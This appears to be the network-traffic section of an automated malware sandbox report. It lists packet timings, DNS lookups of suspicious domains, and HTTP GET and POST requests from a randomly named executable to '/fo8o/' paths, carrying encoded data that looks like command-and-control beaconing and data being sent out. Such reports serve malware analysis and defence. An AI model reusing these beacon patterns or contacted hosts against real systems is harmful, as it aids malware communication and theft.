                                                                                      Dec 2, 2024 14:33:24.792073011 CET805002291.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:24.793889046 CET5002280192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:25.027889967 CET5002280192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:26.047744036 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:26.167896032 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:26.168082952 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:26.171762943 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:26.291843891 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520663023 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520694971 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520711899 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520725965 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520741940 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520755053 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520771980 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520839930 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.520915031 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.520930052 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520946026 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520958900 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.520977020 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.521022081 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.640950918 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.640993118 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.641127110 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.645100117 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.645164013 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.645200968 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.721822977 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.721865892 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.721999884 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.724256992 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.724297047 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.724337101 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.732621908 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.732703924 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.732743025 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.741513968 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.741547108 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.741656065 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.749947071 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:27.750070095 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.755753994 CET5002380192.168.2.691.195.240.94
                                                                                      Dec 2, 2024 14:33:27.876302004 CET805002391.195.240.94192.168.2.6
                                                                                      Dec 2, 2024 14:33:41.627557039 CET5002480192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:41.747551918 CET805002466.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:41.747637033 CET5002480192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:41.749818087 CET5002480192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:41.869782925 CET805002466.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:42.987880945 CET805002466.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:42.987904072 CET805002466.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:42.987973928 CET5002480192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:43.261039972 CET5002480192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:44.279800892 CET5002580192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:44.399956942 CET805002566.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:44.400080919 CET5002580192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:44.402884960 CET5002580192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:44.522942066 CET805002566.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:45.638147116 CET805002566.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:45.638212919 CET805002566.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:45.638281107 CET5002580192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:45.919809103 CET5002580192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:46.936566114 CET5002680192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:47.056679964 CET805002666.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:47.056783915 CET5002680192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:47.059653997 CET5002680192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:47.179673910 CET805002666.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:47.179747105 CET805002666.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:48.333792925 CET805002666.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:48.333825111 CET805002666.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:48.334084988 CET5002680192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:48.576677084 CET5002680192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:49.592776060 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:49.712934017 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:49.713018894 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:49.715419054 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:49.835423946 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947177887 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947206020 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:50.947331905 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:50.951901913 CET5002780192.168.2.666.29.149.46
                                                                                      Dec 2, 2024 14:33:51.071945906 CET805002766.29.149.46192.168.2.6
                                                                                      Dec 2, 2024 14:33:56.969660997 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.089742899 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:57.089838982 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.091831923 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:57.211756945 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445168972 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445317030 CET8050030195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:58.445406914 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:58.604823112 CET5003080192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.624274969 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.745079041 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:33:59.745409012 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.747895002 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:33:59.868074894 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055336952 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055370092 CET8050031195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:01.055454016 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:01.261044025 CET5003180192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.280670881 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.400774002 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:02.400866985 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.403425932 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:02.523330927 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:02.523375988 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.911516905 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.911758900 CET8050032195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:03.914014101 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:03.920861006 CET5003280192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:04.936822891 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.056911945 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:05.058243990 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.060287952 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:05.180195093 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.413804054 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.413897991 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:06.414053917 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:06.423911095 CET5003380192.168.2.6195.110.124.133
                                                                                      Dec 2, 2024 14:34:06.543922901 CET8050033195.110.124.133192.168.2.6
                                                                                      Dec 2, 2024 14:34:28.685940027 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.806118011 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:28.806199074 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.844506979 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:28.964454889 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103638887 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103842020 CET8050035217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:30.103930950 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:30.386218071 CET5003580192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.411987066 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.533271074 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:31.540055990 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.550024033 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:31.670187950 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744534969 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744827032 CET8050036217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:32.744920015 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:33.075998068 CET5003680192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.093709946 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.213860989 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:34.213968992 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.216739893 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:34.336711884 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:34.336798906 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467267036 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467276096 CET8050037217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:35.467375040 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:35.729967117 CET5003780192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.749034882 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.869149923 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:36.869993925 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.871335030 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:36.991247892 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077128887 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077157021 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.077853918 CET8050038217.196.55.202192.168.2.6
                                                                                      Dec 2, 2024 14:34:38.079364061 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.079364061 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.079775095 CET5003880192.168.2.6217.196.55.202
                                                                                      Dec 2, 2024 14:34:38.199774027 CET8050038217.196.55.202192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 2, 2024 14:31:12.193627119 CET5790653192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:31:13.197897911 CET5790653192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:31:13.216698885 CET53579061.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:31:13.337250948 CET53579061.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:31:29.982498884 CET5727353192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:31:30.382107019 CET53572731.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:31:38.435596943 CET5187253192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:31:39.214294910 CET53518721.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:31:53.904438019 CET5490553192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:31:54.315913916 CET53549051.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:32:02.373877048 CET6187753192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:32:03.104346991 CET53618771.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:33:17.704485893 CET5020953192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:33:18.077753067 CET53502091.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:33:32.767770052 CET5555353192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:33:32.995378017 CET53555531.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:33:41.062621117 CET5880453192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:33:41.623344898 CET53588041.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:33:55.967844009 CET5294753192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:33:56.964209080 CET5294753192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:33:56.967350960 CET53529471.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:33:57.101702929 CET53529471.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:34:11.439871073 CET5137053192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:34:11.666167974 CET53513701.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:34:19.773674011 CET5292353192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:34:19.997265100 CET53529231.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:34:28.077369928 CET5441853192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:34:28.547454119 CET53544181.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:34:43.566107035 CET5174653192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:34:43.789280891 CET53517461.1.1.1192.168.2.6
                                                                                      Dec 2, 2024 14:34:52.358592987 CET5369153192.168.2.61.1.1.1
                                                                                      Dec 2, 2024 14:34:52.595752954 CET53536911.1.1.1192.168.2.6

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 2, 2024 14:31:12.193627119 CET192.168.2.61.1.1.10x5eb1Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:13.197897911 CET192.168.2.61.1.1.10x5eb1Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:29.982498884 CET192.168.2.61.1.1.10x2281Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:38.435596943 CET192.168.2.61.1.1.10x9b25Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:53.904438019 CET192.168.2.61.1.1.10x88ccStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:32:02.373877048 CET192.168.2.61.1.1.10xcfb2Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:17.704485893 CET192.168.2.61.1.1.10x77caStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:32.767770052 CET192.168.2.61.1.1.10xb876Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:41.062621117 CET192.168.2.61.1.1.10x4cfdStandard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:55.967844009 CET192.168.2.61.1.1.10xd2bfStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:56.964209080 CET192.168.2.61.1.1.10xd2bfStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:11.439871073 CET192.168.2.61.1.1.10x21aStandard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:19.773674011 CET192.168.2.61.1.1.10x4326Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:28.077369928 CET192.168.2.61.1.1.10x6343Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:43.566107035 CET192.168.2.61.1.1.10x2babStandard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:52.358592987 CET192.168.2.61.1.1.10xddbcStandard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 2, 2024 14:31:13.216698885 CET1.1.1.1192.168.2.60x5eb1No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:13.337250948 CET1.1.1.1192.168.2.60x5eb1No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:30.382107019 CET1.1.1.1192.168.2.60x2281Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:39.214294910 CET1.1.1.1192.168.2.60x9b25No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:31:54.315913916 CET1.1.1.1192.168.2.60x88ccName error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:32:03.104346991 CET1.1.1.1192.168.2.60xcfb2No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 2, 2024 14:32:03.104346991 CET1.1.1.1192.168.2.60xcfb2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 2, 2024 14:32:03.104346991 CET1.1.1.1192.168.2.60xcfb2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:18.077753067 CET1.1.1.1192.168.2.60x77caNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:32.995378017 CET1.1.1.1192.168.2.60xb876Name error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:41.623344898 CET1.1.1.1192.168.2.60x4cfdNo error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:56.967350960 CET1.1.1.1192.168.2.60xd2bfNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:56.967350960 CET1.1.1.1192.168.2.60xd2bfNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:57.101702929 CET1.1.1.1192.168.2.60xd2bfNo error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 2, 2024 14:33:57.101702929 CET1.1.1.1192.168.2.60xd2bfNo error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:11.666167974 CET1.1.1.1192.168.2.60x21aName error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:19.997265100 CET1.1.1.1192.168.2.60x4326Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:28.547454119 CET1.1.1.1192.168.2.60x6343No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:28.547454119 CET1.1.1.1192.168.2.60x6343No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:43.789280891 CET1.1.1.1192.168.2.60x2babName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                      Dec 2, 2024 14:34:52.595752954 CET1.1.1.1192.168.2.60xddbcName error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.3xfootball.com
                                                                                      • www.goldenjade-travel.com
                                                                                      • www.magmadokum.com
                                                                                      • www.rssnewscast.com
                                                                                      • www.techchains.info
                                                                                      • www.elettrosistemista.zip
                                                                                      • www.empowermedeco.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649794154.215.72.110806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:31:13.345572948 CET525OUTGET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.3xfootball.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:31:14.936794996 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 02 Dec 2024 13:31:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649853116.50.37.244806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:31:39.339704990 CET807OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
